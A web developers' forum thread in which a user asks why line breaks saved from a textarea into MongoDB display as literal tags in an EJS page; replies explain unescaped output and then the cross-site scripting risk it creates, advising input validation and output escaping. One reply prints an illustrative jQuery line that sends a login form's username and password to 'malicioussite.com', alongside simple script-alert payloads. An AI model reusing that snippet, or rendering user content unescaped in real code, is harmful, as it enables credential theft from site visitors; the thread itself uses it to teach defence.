Html doesnt recognize tags in the mongodb data that return

html
workspace
javascript
nodejs
mongodb

#1

I try to show some data that i get from textarea tag and saved it in mongodb When i try to show it with the
tag the html just show it like this and not get new line:

Review about the short animation film 'PUAL':<br /><br /> "First, Congratulations! A very well <br />   <br /> thought out piece. The sound design

My code is:html:

<div>
     <p> <%= person.quoteEng%></p>
</div>

node js:

router.get("/", function(req, res){
// Get all projects from DB 
Person.find({})(function(err, allperson){
   if(err){
    console.log(err);
   } else {
     res.render("feedback/index",{persons: allperson});
}

and the from to get text area is regular and in nodejs side:

router.post("/",middleware.isLoggedIn, function(req,res){
var quoteEng = req.body.quoteEng;
var NewPerson = { quoteEng: quoteEng}
Person.create(NewPerson, function(err, newlyPerson){
if(err){
    console.log(err);
}else{
    console.log(newlyPerson);
     res.redirect("feedback/0");
}
});
});

I used nl2br for change /n to
pls help me thank you


#2

It comes on the line
<%= person.quoteEng %>
This is EJS, and the tags you are using mean “output the value, escaping any HTML.” What you are looking for is “output the value, unescaped,” which can be achieved using this:
<%- person.quoteEng %>
Using a - instead of a =. Be aware that this means ANY HTML you output is left unescaped, which could be a security risk if the values are from users. For instance, I could perform a Cross Site Scripting attack like this:
<script>alert("XSS possible");</script>


#3

Thank you very very very much man!
It solved my problem
Can I get more information about this security risk
for example if the attacker can get my username and password of the user that fill up the form?
and how can I protect my site from this?


#4

So, I’m not sure where the data in your DB comes from. If it comes from the user, you should follow the following workflow:
Validate input, escape output
Simply put, make sure what the user is putting in is OK (the length is okay, the name isn’t already in the database, etc). When outputting to the page, escape the content, to prevent from HTML being inserted. While allowing HTML means you can use great features like the A tag, it also means I could put a script tag like this in your database, and you would output it for any user who visits that page:
$.post("malicioussite.com", { username: $("#loginform").children().find(0).val(), password: $("#loginform").children().find(1).val() });
(The above jQuery is probably not correct, but I just wrote it to demonstrate the below).
The above code would simply take the username and password fields in the login form of a website, and send their values to a malicious server. The user would be none the wiser, and this could happen for every user who loads that page.

The following is a real-world example of XSS, on the popular Tweeting platform Tweetdeck.

In the above, they were able to insert a script tag with a script that automatically retweeted the tweet, and then displayed a dialog to the user. Because script tags are invisible, the user would only see a heart:
:heart:

This was simply because they forgot to escape output. Escaping output converts several characters into “HTML entities” which are rendered in the browser and not treated as HTML. So for instance, < becomes &lt; > becomes &gt; " becomes &quot; and & becomes &amp;. You can actually see this, just click reply and type one of the above entities, and look in the preview.

This community also has some protection measures. Below is a script tag, but it will be auto-removed by Discourse, which is the software they use.

In the blank space above, I had the following:
<script>alert(“hello”);</script>
which I had to type as:
&lt;script&gt;alert("hello");&lt;/script&gt;

As long as you do all of the above, which you actually did by accident and didn’t want, you don’t have to worry about XSS. And the rule of thumb is: “Never trust the user. Ever.”